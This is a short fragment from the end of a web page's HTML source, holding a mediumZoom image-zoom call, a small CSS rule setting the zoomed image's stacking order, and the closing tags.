mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>